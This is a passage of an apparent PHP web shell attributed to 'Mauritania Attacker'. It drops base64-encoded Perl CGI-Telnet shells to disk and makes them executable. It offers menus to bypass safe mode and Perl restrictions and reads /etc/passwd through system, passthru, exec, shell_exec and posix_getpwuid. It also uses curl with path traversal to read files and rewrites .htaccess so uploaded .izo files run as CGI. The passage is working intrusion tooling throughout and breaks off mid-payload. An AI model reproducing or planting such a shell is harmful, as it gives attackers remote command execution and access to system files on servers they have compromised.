GJlIGRpc3BsYXllZC4NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBFeGVjdXRlQ29tbWFuZA0Kew0KCWlmKCRSdW5Db21tYW5kID1+IG0vXlxzKmNkXHMrKC4rKS8pICMgaXQgaXMgYSBjaGFuZ2UgZGlyIGNvbW1hbmQNCgl7DQoJCSMgd2UgY2hhbmdlIHRoZSBkaXJlY3RvcnkgaW50ZXJuYWxseS4gVGhlIG91dHB1dCBvZiB0aGUNCgkJIyBjb21tYW5kIGlzIG5vdCBkaXNwbGF5ZWQuDQoJCQ0KCQkkT2xkRGlyID0gJEN1cnJlbnREaXI7DQoJCSRDb21tYW5kID0gImNkIFwiJEN1cnJlbnREaXJcIiIuJENtZFNlcC4iY2QgJDEiLiRDbWRTZXAuJENtZFB3ZDsNCgkJY2hvcCgkQ3VycmVudERpciA9IGAkQ29tbWFuZGApOw0KCQkmUHJpbnRQYWdlSGVhZGVyKCJjIik7DQoJCSRQcm9tcHQgPSAkV2luTlQgPyAiJE9sZERpcj4gIiA6ICJbYWRtaW5cQCRTZXJ2ZXJOYW1lICRPbGREaXJdXCQgIjsNCgkJcHJpbnQgIiRQcm9tcHQgJFJ1bkNvbW1hbmQiOw0KCX0NCgllbHNlICMgc29tZSBvdGhlciBjb21tYW5kLCBkaXNwbGF5IHRoZSBvdXRwdXQNCgl7DQoJCSZQcmludFBhZ2VIZWFkZXIoImMiKTsNCgkJJFByb21wdCA9ICRXaW5OVCA/ICIkQ3VycmVudERpcj4gIiA6ICJbYWRtaW5cQCRTZXJ2ZXJOYW1lICRDdXJyZW50RGlyXVwkICI7DQoJCXByaW50ICIkUHJvbXB0ICRSdW5Db21tYW5kPHhtcD4iOw0KCQkkQ29tbWFuZCA9ICJjZCBcIiRDdXJyZW50RGlyXCIiLiRDbWRTZXAuJFJ1bkNvbW1hbmQuJFJlZGlyZWN0b3I7DQoJCWlmKCEkV2luTlQpDQoJCXsNCgkJCSRTSUd7J0FMUk0nfSA9IFwmQ29tbWFuZFRpbWVvdXQ7DQoJCQlhbGFybSgkQ29tbWFuZFRpbWVvdXREdXJhdGlvbik7DQoJCX0NCgkJaWYoJFNob3dEeW5hbWljT3V0cHV0KSAjIHNob3cgb3V0cHV0IGFzIGl0IGlzIGdlbmVyYXRlZA0KCQl7DQoJCQkkfD0xOw0KCQkJJENvbW1hbmQgLj0gIiB8IjsNCgkJCW9wZW4oQ29tbWFuZE91dHB1dCwgJENvbW1hbmQpOw0KCQkJd2hpbGUoPENvbW1hbmRPdXRwdXQ+KQ0KCQkJew0KCQkJCSRfID1+IHMvKFxufFxyXG4pJC8vOw0KCQkJCXByaW50ICIkX1xuIjsNCgkJCX0NCgkJCSR8PTA7DQoJCX0NCgkJZWxzZSAjIHNob3cgb3V0cHV0IGFmdGVyIGNvbW1hbmQgY29tcGxldGVzDQoJCXsNCgkJCXByaW50IGAkQ29tbWFuZGA7DQoJCX0NCgkJaWYoISRXaW5OVCkNCgkJew0KCQkJYWxhcm0oMCk7DQoJCX0NCgkJcHJpbnQgIjwveG1wPiI7DQoJfQ0KCSZQcmludENvbW1hbmRMaW5lSW5wdXRGb3JtOw0KCSZQcmludFBhZ2VGb290ZXI7DQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgVGhpcyBmdW5jdGlvbiBkaXNwbGF5cyB0aGUgcGFnZSB0aGF0IGNvbnRhaW5zIGEgbGluayB3aGljaCBhbGxvd3MgdGhlIHVzZXINCiMgdG8gZG93bmxvYWQgdGhlIHNwZWNpZmllZCBmaWxlLiBUaGUgcGFnZSBhbHNvIGNvbnRhaW5zIGEgYXV0by1yZWZyZXNoDQojIGZlYXR1cmUgdGhhdCBzdGFydHMgdGhlIGRvd25sb2FkIGF1dG9tYXRpY2FsbHkuDQojIEFyZ3VtZW50IDE6IEZ1bGx5IHF1YWxpZmllZCBmaWxlbmFtZSBvZiB0aGUgZmlsZSB0byBiZSBkb3dubG9hZGVkDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUHJpbnREb3dubG9hZExpbmtQYWdlDQp7DQoJbG9jYWwoJEZpbGVVcmwpID0gQF87DQoJaWYoLWUgJEZpbGVVcmwpICMgaWYgdGhlIGZpbGUgZXhpc3RzDQoJew0KCQkjIGVuY29kZSB0aGUgZmlsZSBsaW5rIHNvIHdlIGNhbiBzZW5kIGl0IHRvIHRoZSBicm93c2VyDQoJCSRGaWxlVXJsID1+IHMvKFteYS16QS1aMC05XSkvJyUnLnVucGFjaygiSCoiLCQxKS9lZzsNCgkJJERvd25sb2FkTGluayA9ICIkU2NyaXB0TG9jYXRpb24/YT1kb3dubG9hZCZmPSRGaWxlVXJsJm89Z28iOw0KCQkkSHRtbE1ldGFIZWFkZXIgPSAiPG1ldGEgSFRUUC1FUVVJVj1cIlJlZnJlc2hcIiBDT05URU5UPVwiMTsgVVJMPSREb3dubG9hZExpbmtcIj4iOw0KCQkmUHJpbnRQYWdlSGVhZGVyKCJjIik7DQoJCXByaW50IDw8RU5EOw0KPGNvZGU+DQoNClNlbmRpbmcgRmlsZSAkVHJhbnNmZXJGaWxlLi4uPGJyPg0KSWYgdGhlIGRvd25sb2FkIGRvZXMgbm90IHN0YXJ0IGF1dG9tYXRpY2FsbHksDQo8YSBocmVmPSIkRG93bmxvYWRMaW5rIj5DbGljayBIZXJlPC9hPi4NCkVORA0KCQkmUHJpbnRDb21tYW5kTGluZUlucHV0Rm9ybTsNCgkJJlByaW50UGFnZUZvb3RlcjsNCgl9DQoJZWxzZSAjIGZpbGUgZG9lc24ndCBleGlzdA0KCXsNCgkJJlByaW50UGFnZUhlYWRlcigiZiIpOw0KCQlwcmludCAiRmFpbGVkIHRvIGRvd25sb2FkICRGaWxlVXJsOiAkISI7DQoJCSZQcmludEZpbGVEb3dubG9hZEZvcm07DQoJCSZQcmludFBhZ2VGb290ZXI7DQoJfQ0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFRoaXMgZnVuY3Rpb24gcmVhZHMgdGhlIHNwZWNpZmllZCBmaWxlIGZyb20gdGhlIGRpc2sgYW5kIHNlbmRzIGl0IHRvIHRoZQ0KIyBicm93c2VyLCBzbyB0aGF0IGl0IGNhbiBiZSBkb3dubG9hZGVkIGJ5IHRoZSB1c2VyLg0KIyBBcmd1bWVudCAxOiBGdWxseSBxdWFsaWZpZWQgcGF0aG5hbWUgb2YgdGhlIGZpbGUgdG8gYmUgc2VudC4NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBTZW5kRmlsZVRvQnJvd3Nlcg0Kew0KCWxvY2FsKCRTZW5kRmlsZSkgPSBAXzsNCglpZihvcGVuKFNFTkRGSUxFLCAkU2VuZEZpbGUpKSAjIGZpbGUgb3BlbmVkIGZvciByZWFkaW5nDQoJew0KCQlpZigkV2luTlQpDQoJCXsNCgkJCWJpbm1vZGUoU0VOREZJTEUpOw0KCQkJYmlubW9kZShTVERPVVQpOw0KCQl9DQoJCSRGaWxlU2l6ZSA9IChzdGF0KCRTZW5kRmlsZSkpWzddOw0KCQkoJEZpbGVuYW1lID0gJFNlbmRGaWxlKSA9fiAgbSEoW14vXlxcXSopJCE7DQoJCXByaW50ICJDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtdW5rbm93blxuIjsNCgkJcHJpbnQgIkNvbnRlbnQtTGVuZ3RoOiAkRmlsZVNpemVcbiI7DQoJCXByaW50ICJDb250ZW50LURpc3Bvc2l0aW9uOiBhdHRhY2htZW50OyBmaWxlbmFtZT0kMVxuXG4iOw0KCQlwcmludCB3aGlsZSg8U0VOREZJTEU+KTsNCgkJY2xvc2UoU0VOREZJTEUpOw0KCX0NCgllbHNlICMgZmFpbGVkIHRvIG9wZW4gZmlsZQ0KCXsNCgkJJlByaW50UGFnZUhlYWRlcigiZiIpOw0KCQlwcmludCAiRmFpbGVkIHRvIGRvd25sb2FkICRTZW5kRmlsZTogJCEiOw0KCQkmUHJpbnRGaWxlRG93bmxvYWRGb3JtOw0KDQoJCSZQcmludFBhZ2VGb290ZXI7DQoJfQ0KfQ0KDQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgd2hlbiB0aGUgdXNlciBkb3dubG9hZHMgYSBmaWxlLiBJdCBkaXNwbGF5cyBhIG1lc3NhZ2UNCiMgdG8gdGhlIHVzZXIgYW5kIHByb3ZpZGVzIGEgbGluayB0aHJvdWdoIHdoaWNoIHRoZSBmaWxlIGNhbiBiZSBkb3dubG9hZGVkLg0KIyBUaGlzIGZ1bmN0aW9uIGlzIGFsc28gY2FsbGVkIHdoZW4gdGhlIHVzZXIgY2xpY2tzIG9uIHRoYXQgbGluay4gSW4gdGhpcyBjYXNlLA0KIyB0aGUgZmlsZSBpcyByZWFkIGFuZCBzZW50IHRvIHRoZSBicm93c2VyLg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIEJlZ2luRG93bmxvYWQNCnsNCgkjIGdldCBmdWxseSBxdWFsaWZpZWQgcGF0aCBvZiB0aGUgZmlsZSB0byBiZSBkb3dubG9hZGVkDQoJaWYoKCRXaW5OVCAmICgkVHJhbnNmZXJGaWxlID1+IG0vXlxcfF4uOi8pKSB8DQoJCSghJFdpbk5UICYgKCRUcmFuc2ZlckZpbGUgPX4gbS9eXC8vKSkpICMgcGF0aCBpcyBhYnNvbHV0ZQ0KCXsNCgkJJFRhcmdldEZpbGUgPSAkVHJhbnNmZXJGaWxlOw0KCX0NCgllbHNlICMgcGF0aCBpcyByZWxhdGl2ZQ0KCXsNCgkJY2hvcCgkVGFyZ2V0RmlsZSkgaWYoJFRhcmdldEZpbGUgPSAkQ3VycmVudERpcikgPX4gbS9bXFxcL10kLzsNCgkJJFRhcmdldEZpbGUgLj0gJFBhdGhTZXAuJFRyYW5zZmVyRmlsZTsNCgl9DQoNCglpZigkT3B0aW9ucyBlcSAiZ28iKSAjIHdlIGhhdmUgdG8gc2VuZCB0aGUgZmlsZQ0KCXsNCgkJJlNlbmRGaWxlVG9Ccm93c2VyKCRUYXJnZXRGaWxlKTsNCgl9DQoJZWxzZSAjIHdlIGhhdmUgdG8gc2VuZCBvbmx5IHRoZSBsaW5rIHBhZ2UNCgl7DQoJCSZQcmludERvd25sb2FkTGlua1BhZ2UoJFRhcmdldEZpbGUpOw0KCX0NCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBUaGlzIGZ1bmN0aW9uIGlzIGNhbGxlZCB3aGVuIHRoZSB1c2VyIHdhbnRzIHRvIHVwbG9hZCBhIGZpbGUuIElmIHRoZQ0KIyBmaWxlIGlzIG5vdCBzcGVjaWZpZWQsIGl0IGRpc3BsYXlzIGEgZm9ybSBhbGxvd2luZyB0aGUgdXNlciB0byBzcGVjaWZ5IGENCiMgZmlsZSwgb3RoZXJ3aXNlIGl0IHN0YXJ0cyB0aGUgdXBsb2FkIHByb2Nlc3MuDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgVXBsb2FkRmlsZQ0Kew0KCSMgaWYgbm8gZmlsZSBpcyBzcGVjaWZpZWQsIHByaW50IHRoZSB1cGxvYWQgZm9ybSBhZ2Fpbg0KCWlmKCRUcmFuc2ZlckZpbGUgZXEgIiIpDQoJew0KCQkmUHJpbnRQYWdlSGVhZGVyKCJmIik7DQoJCSZQcmludEZpbGVVcGxvYWRGb3JtOw0KCQkmUHJpbnRQYWdlRm9vdGVyOw0KCQlyZXR1cm47DQoJfQ0KCSZQcmludFBhZ2VIZWFkZXIoImMiKTsNCg0KCSMgc3RhcnQgdGhlIHVwbG9hZGluZyBwcm9jZXNzDQoJcHJpbnQgIlVwbG9hZGluZyAkVHJhbnNmZXJGaWxlIHRvICRDdXJyZW50RGlyLi4uPGJyPiI7DQoNCgkjIGdldCB0aGUgZnVsbGx5IHF1YWxpZmllZCBwYXRobmFtZSBvZiB0aGUgZmlsZSB0byBiZSBjcmVhdGVkDQoJY2hvcCgkVGFyZ2V0TmFtZSkgaWYgKCRUYXJnZXROYW1lID0gJEN1cnJlbnREaXIpID1+IG0vW1xcXC9dJC87DQoJJFRyYW5zZmVyRmlsZSA9fiBtIShbXi9eXFxdKikkITsNCgkkVGFyZ2V0TmFtZSAuPSAkUGF0aFNlcC4kMTsNCg0KCSRUYXJnZXRGaWxlU2l6ZSA9IGxlbmd0aCgkaW57J2ZpbGVkYXRhJ30pOw0KCSMgaWYgdGhlIGZpbGUgZXhpc3RzIGFuZCB3ZSBhcmUgbm90IHN1cHBvc2VkIHRvIG92ZXJ3cml0ZSBpdA0KCWlmKC1lICRUYXJnZXROYW1lICYmICRPcHRpb25zIG5lICJvdmVyd3JpdGUiKQ0KCXsNCgkJcHJpbnQgIkZhaWxlZDogRGVzdGluYXRpb24gZmlsZSBhbHJlYWR5IGV4aXN0cy48YnI+IjsNCgl9DQoJZWxzZSAjIGZpbGUgaXMgbm90IHByZXNlbnQNCgl7DQoJCWlmKG9wZW4oVVBMT0FERklMRSwgIj4kVGFyZ2V0TmFtZSIpKQ0KCQl7DQoJCQliaW5tb2RlKFVQTE9BREZJTEUpIGlmICRXaW5OVDsNCgkJCXByaW50IFVQTE9BREZJTEUgJGlueydmaWxlZGF0YSd9Ow0KCQkJY2xvc2UoVVBMT0FERklMRSk7DQoJCQlwcmludCAiVHJhbnNmZXJlZCAkVGFyZ2V0RmlsZVNpemUgQnl0ZXMuPGJyPiI7DQoJCQlwcmludCAiRmlsZSBQYXRoOiAkVGFyZ2V0TmFtZTxicj4iOw0KCQl9DQoJCWVsc2UNCgkJew0KCQkJcHJpbnQgIkZhaWxlZDogJCE8YnI+IjsNCgkJfQ0KCX0NCglwcmludCAiIjsNCgkmUHJpbnRDb21tYW5kTGluZUlucHV0Rm9ybTsNCg0KCSZQcmludFBhZ2VGb290ZXI7DQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgd2hlbiB0aGUgdXNlciB3YW50cyB0byBkb3dubG9hZCBhIGZpbGUuIElmIHRoZQ0KIyBmaWxlbmFtZSBpcyBub3Qgc3BlY2lmaWVkLCBpdCBkaXNwbGF5cyBhIGZvcm0gYWxsb3dpbmcgdGhlIHVzZXIgdG8gc3BlY2lmeSBhDQojIGZpbGUsIG90aGVyd2lzZSBpdCBkaXNwbGF5cyBhIG1lc3NhZ2UgdG8gdGhlIHVzZXIgYW5kIHByb3ZpZGVzIGEgbGluaw0KIyB0aHJvdWdoICB3aGljaCB0aGUgZmlsZSBjYW4gYmUgZG93bmxvYWRlZC4NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBEb3dubG9hZEZpbGUNCnsNCgkjIGlmIG5vIGZpbGUgaXMgc3BlY2lmaWVkLCBwcmludCB0aGUgZG93bmxvYWQgZm9ybSBhZ2Fpbg0KCWlmKCRUcmFuc2ZlckZpbGUgZXEgIiIpDQoJew0KCQkmUHJpbnRQYWdlSGVhZGVyKCJmIik7DQoJCSZQcmludEZpbGVEb3dubG9hZEZvcm07DQoJCSZQcmludFBhZ2VGb290ZXI7DQoJCXJldHVybjsNCgl9DQoJDQoJIyBnZXQgZnVsbHkgcXVhbGlmaWVkIHBhdGggb2YgdGhlIGZpbGUgdG8gYmUgZG93bmxvYWRlZA0KCWlmKCgkV2luTlQgJiAoJFRyYW5zZmVyRmlsZSA9fiBtL15cXHxeLjovKSkgfA0KCQkoISRXaW5OVCAmICgkVHJhbnNmZXJGaWxlID1+IG0vXlwvLykpKSAjIHBhdGggaXMgYWJzb2x1dGUNCgl7DQoJCSRUYXJnZXRGaWxlID0gJFRyYW5zZmVyRmlsZTsNCgl9DQoJZWxzZSAjIHBhdGggaXMgcmVsYXRpdmUNCgl7DQoJCWNob3AoJFRhcmdldEZpbGUpIGlmKCRUYXJnZXRGaWxlID0gJEN1cnJlbnREaXIpID1+IG0vW1xcXC9dJC87DQoJCSRUYXJnZXRGaWxlIC49ICRQYXRoU2VwLiRUcmFuc2ZlckZpbGU7DQoJfQ0KDQoJaWYoJE9wdGlvbnMgZXEgImdvIikgIyB3ZSBoYXZlIHRvIHNlbmQgdGhlIGZpbGUNCgl7DQoJCSZTZW5kRmlsZVRvQnJvd3NlcigkVGFyZ2V0RmlsZSk7DQoJfQ0KCWVsc2UgIyB3ZSBoYXZlIHRvIHNlbmQgb25seSB0aGUgbGluayBwYWdlDQoJew0KCQkmUHJpbnREb3dubG9hZExpbmtQYWdlKCRUYXJnZXRGaWxlKTsNCgl9DQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgTWFpbiBQcm9ncmFtIC0gRXhlY3V0aW9uIFN0YXJ0cyBIZXJlDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQomUmVhZFBhcnNlOw0KJkdldENvb2tpZXM7DQoNCiRTY3JpcHRMb2NhdGlvbiA9ICRFTlZ7J1NDUklQVF9OQU1FJ307DQokU2VydmVyTmFtZSA9ICRFTlZ7J1NFUlZFUl9OQU1FJ307DQokTG9naW5QYXNzd29yZCA9ICRpbnsncCd9Ow0KJFJ1bkNvbW1hbmQgPSAkaW57J2MnfTsNCiRUcmFuc2ZlckZpbGUgPSAkaW57J2YnfTsNCiRPcHRpb25zID0gJGlueydvJ307DQoNCiRBY3Rpb24gPSAkaW57J2EnfTsNCiRBY3Rpb24gPSAibG9naW4iIGlmKCRBY3Rpb24gZXEgIiIpOyAjIG5vIGFjdGlvbiBzcGVjaWZpZWQsIHVzZSBkZWZhdWx0DQoNCiMgZ2V0IHRoZSBkaXJlY3RvcnkgaW4gd2hpY2ggdGhlIGNvbW1hbmRzIHdpbGwgYmUgZXhlY3V0ZWQNCiRDdXJyZW50RGlyID0gJGlueydkJ307DQpjaG9wKCRDdXJyZW50RGlyID0gYCRDbWRQd2RgKSBpZigkQ3VycmVudERpciBlcSAiIik7DQoNCiRMb2dnZWRJbiA9ICRDb29raWVzeydTQVZFRFBXRCd9IGVxICRQYXNzd29yZDsNCg0KaWYoJEFjdGlvbiBlcSAibG9naW4iIHx8ICEkTG9nZ2VkSW4pICMgdXNlciBuZWVkcy9oYXMgdG8gbG9naW4NCnsNCgkmUGVyZm9ybUxvZ2luOw0KDQp9DQplbHNpZigkQWN0aW9uIGVxICJjb21tYW5kIikgIyB1c2VyIHdhbnRzIHRvIHJ1biBhIGNvbW1hbmQNCnsNCgkmRXhlY3V0ZUNvbW1hbmQ7DQp9DQplbHNpZigkQWN0aW9uIGVxICJ1cGxvYWQiKSAjIHVzZXIgd2FudHMgdG8gdXBsb2FkIGEgZmlsZQ0Kew0KCSZVcGxvYWRGaWxlOw0KfQ0KZWxzaWYoJEFjdGlvbiBlcSAiZG93bmxvYWQiKSAjIHVzZXIgd2FudHMgdG8gZG93bmxvYWQgYSBmaWxlDQp7DQoJJkRvd25sb2FkRmlsZTsNCn0NCmVsc2lmKCRBY3Rpb24gZXEgImxvZ291dCIpICMgdXNlciB3YW50cyB0byBsb2dvdXQNCnsNCgkmUGVyZm9ybUxvZ291dDsNCn0=';
2635.  
2636. $file = fopen("vw.root" ,"w+");
2637. $write = fwrite ($file ,base64_decode($cgipl));
2638. fclose($file);
2639. chmod("vw.root",0755);
2640. echo "<br><center><span style='font-size:30px; font-family:Fredericka the Great; color:#009900'>Bypass Perl Security</span><br><br><iframe src=cgipl/vw.root width=75% height=50% frameborder=0></iframe>
2641.  
2642. </div>";
2643. }
2644. elseif($_GET['do'] == 'com64') {
2645. echo "<center>";
2646. echo "<ul>";
2647. echo "<li> <a href='?dir=$dir&do=betc'>Bypass /etc/passwd</a> </li>";
2648. echo "<li> <a href='?dir=$dir&do=baus'>Bypass User Server</a> </li>";
2649. echo "<li> <a href='?dir=$dir&do=b'>Bypass Perl Security</a> </li>";
2650. echo "<li> <a href='?dir=$dir&do=barut'>Bypass Root Access</a> </li>";
2651. echo "<li> <a href='?dir=$dir&do=beesem'>Bypass Safe Mode</a> </li>";
2652. echo "<li> <a href='?dir=$dir&do=com64'>Base64 Command</a> </li>";
2653. echo "</ul>";
2654. echo "</center>";
2655. echo '<br><center><span style="font-size:30px; font-family:Fredericka the Great; color:white">Base64 Command</span><center><br>';
2656. echo ' <tr>
2657. <td width="100%" height="1">';
2658. if (empty($_POST['fak'])){
2659. echo '<form method="POST"><input type="text" name="fak" size="70" value="/etc/passwd"> <input type="submit" value="Encode"></form><br>';
2660. }else{
2661. $b4se64 =$_POST['fak'];
2662. $heno =base64_encode($b4se64);
2663. echo '<p align="center">';
2664. echo '<textarea method="POST" rows="1" cols="60" wrar="off">';
2665. print $heno;
2666. echo '</textarea>';
2667. }
2668. echo '<form method="post" /><input type="text" name="coz" size="43" value="L2V0Yy9wYXNzd2Q=" /> <input type="submit" value="Execute" /> <select name=dec><option value=show>Read</option><option value=decode>Command</option></select></form><br>';
2669. if( !empty($_POST['coz']) )
2670. if ($dec=='decode'){echo '<form name=form method=POST>';}
2671. echo "<p align=center><textarea style='width: 543px; height: 420px;' class='area' method='POST' name='codene' cols='70' rows='15' wrar='off' >";
2672. $ss=$_POST['coz'];
2673. $file = base64_decode($ss);
2674. if((curl_exec(curl_init('file:ftp://../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../'.$file))) and empty($file))
2675. if ($_POST['dec']=='decode'){echo base64_encode($_POST['codene']);}
2676. echo '</textarea></p>';
2677. echo '</td>
2678. </tr>';
2679.  
2680. }
2681. elseif($_GET['do'] == 'betc') {
2682. echo "<center>";
2683. echo "<ul>";
2684. echo "<li> <a href='?dir=$dir&do=betc'>Bypass /etc/passwd</a> </li>";
2685. echo "<li> <a href='?dir=$dir&do=baper'>Bypass Perl Security</a> </li>";
2686. echo "<li> <a href='?dir=$dir&do=baus'>Bypass User Server</a> </li>";
2687. echo "<li> <a href='?dir=$dir&do=barut'>Bypass Perl Security</a> </li>";
2688. echo "<li> <a href='?dir=$dir&do=beesem'>Bypass Safe Mode</a> </li>";
2689. echo "<li> <a href='?dir=$dir&do=com64'>Base64 Command</a> </li>";
2690. echo "</ul>";
2691. echo "</center>";
2692. echo '<br><center><span style="font-size:30px; font-family:Fredericka the Great; color:#009900">Bypass /etc/passwd Priv8</span><br>Coded By Mauritania Attacker<center><br>';
2693. echo '<div class="tul"><font color="ee5500" face="Tahoma, Geneva, sans-serif" style="font-size: 8pt">
2694.  
2695.  
2696. <p><center><font face="Tahoma" color="#007700" size="2pt">Bypass with System Function
2697. <form method="post">
2698. <input type="submit" value="Bypass" name="syst">
2699. </form>
2700. </center>
2701. </p>
2702.  
2703. <p><center>Bypass with Passthru Function
2704. <form method="post">
2705. <font face="Tahoma" color="#007700" size="2pt">
2706. <input type="submit" value="Bypass" name="passth">
2707. </form>
2708. </center>
2709. </p>
2710.  
2711. <p><center><font face="Tahoma" color="#007700" size="2pt">Bypass with exec Function
2712. <form method="post">
2713. <input type="submit" value="Bypass" name="ex">
2714. </form>
2715. </center>
2716. </p>
2717.  
2718. <p><center><font face="Tahoma" color="#007700" size="2pt">Bypass with shell_exec Function
2719. <form method="post">
2720. <input type="submit" value="Bypass" name="shex">
2721. </form>
2722. </center>
2723. </p>
2724.  
2725. <p><center><font face="Tahoma" color="#007700" size="2pt">Bypass with posix_getpwuid Function
2726. <form method="post">
2727. <input type="submit" value="Bypass" name="mauritania">
2728. </form>
2729. </center>
2730. </p>
2731.  
2732. <center>';
2733.  
2734.  
2735. //System Function //
2736. if($_POST['syst'])
2737. {
2738.  
2739. echo"<textarea style='width: 543px; height: 420px;' class='area' cols='65' rows='15'>";
2740. echo system("cat /etc/passwd");
2741. echo"</textarea><br>";
2742. echo"
2743. <br>
2744. <b>
2745. </b>
2746. <br>
2747. ";
2748. }
2749. echo '
2750. </center>
2751. <center>';
2752.  
2753.  
2754.  
2755. //Passthru Function //
2756. if($_POST['passth'])
2757. {
2758. echo"<textarea style='width: 543px; height: 420px;' class='area' cols='65' rows='15'>";
2759. echo passthru("cat /etc/passwd");
2760. echo"</textarea><br>";
2761. echo"
2762. <br>
2763. <b>
2764.  
2765. </b>
2766. <br>
2767. ";
2768.  
2769. }
2770.  
2771.  
2772. echo '
2773. </center>
2774. <center>';
2775.  
2776.  
2777.  
2778. //exec Function //
2779. if($_POST['ex'])
2780. {
2781. echo"<textarea style='width: 543px; height: 420px;' class='area' cols='65' rows='15'>";
2782. echo exec("cat /etc/passwd");
2783. echo"</textarea><br>";
2784. echo"
2785. <br>
2786. <b>
2787. </b>
2788. <br>
2789. ";
2790. }
2791.  
2792.  
2793. echo '
2794. </center>
2795. <center>';
2796.  
2797.  
2798. //exec Function //
2799. if($_POST['shex'])
2800. {
2801. echo"<textarea style='width: 543px; height: 420px;' class='area' cols='65' rows='15'>";
2802. echo shell_exec("cat /etc/passwd");
2803. echo"</textarea><br>";
2804. echo"
2805. <br>
2806. <b>
2807. </b>
2808. <br>
2809. ";
2810. }
2811. echo '</center>
2812. <center>';
2813.  
2814.  
2815.  
2816. //posix_getpwuid Function //
2817. if($_POST['mauritania'])
2818. {
2819. echo"<textarea style='width: 543px; height: 420px;' class='area' cols='65' rows='15'>";
2820. for($uid=0;$uid<60000;$uid++){
2821. $ara = posix_getpwuid($uid);
2822. if (!empty($ara)) {
2823. while (list ($key, $val) = each($ara)){
2824. print "$val:";
2825. }
2826. print "\n";
2827. }
2828. }
2829. echo"</textarea><br>";
2830. echo"
2831. <br>
2832. <b>
2833. </b>
2834. <br>
2835. ";
2836. }
2837. }
2838. elseif($_GET['do'] == 'cgi') {
2839. mkdir('cgi4e', 0755);
2840. chdir('cgi4e');
2841. $kokdosya = ".htaccess";
2842. $dosya_adi = "$kokdosya";
2843. $dosya = fopen ($dosya_adi , 'w') or die ("Dosya a&#231;&#305;lamad&#305;!");
2844. $metin = "AddType application/x-httpd-cgi .izo
2845. AddType application/x-httpd-cgi .izo
2846.  
2847. AddHandler cgi-script .izo
2848. AddHandler cgi-script .izo";
2849. fwrite ( $dosya , $metin ) ;
2850. fclose ($dosya);
2851. $cgi4e = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQp1c2UgTUlNRTo6QmFzZTY0Ow0KJFZlcnNpb249ICJDR0ktVGVsbmV0IFZlcnNpb24gMS40IjsNCiRFZGl0UGVyc2lvbj0iQW5vbkdob3N0IjsNCg0KJFBhc3N3b3JkID0gIkJUTSI7CQkJIyBDaGFuZ2UgdGhpcy4gWW91IHdpbGwgbmVlZCB0byBlbnRlciB0aGlzDQoJCQkJIyB0byBsb2dpbi4NCnN1YiBJc19XaW4oKXsNCgkkb3MgPSAmdHJpbSgkRU5WeyJTRVJWRVJfU09GVFdBUkUifSk7DQoJaWYoJG9zID1+IG0vd2luL2kpew0KCQlyZXR1cm4gMTsNCgl9ZWxzZXsNCgkJcmV0dXJuIDA7DQoJfQ0KfQ0KJFdpbk5UID0gJklzX1dpbigpOwkJCSMgWW91IG5lZWQgdG8gY2hhbmdlIHRoZSB2YWx1ZSBvZiB0aGlzIHRvIDEgaWYNCgkJCQkJIyB5b3UncmUgcnVubmluZyB0aGlzIHNjcmlwdCBvbiBhIFdpbmRvd3MgTlQNCgkJCQkJIyBtYWNoaW5lLiBJZiB5b3UncmUgcnVubmluZyBpdCBvbiBVbml4LCB5b3UNCgkJCQkJIyBjYW4gbGVhdmUgdGhlIHZhbHVlIGFzIGl0IGlzLg0KDQokTlRDbWRTZXAgPSAiJiI7CQkJIyBUaGlzIGNoYXJhY3RlciBpcyB1c2VkIHRvIHNlcGVyYXRlIDIgY29tbWFuZHMNCgkJCQ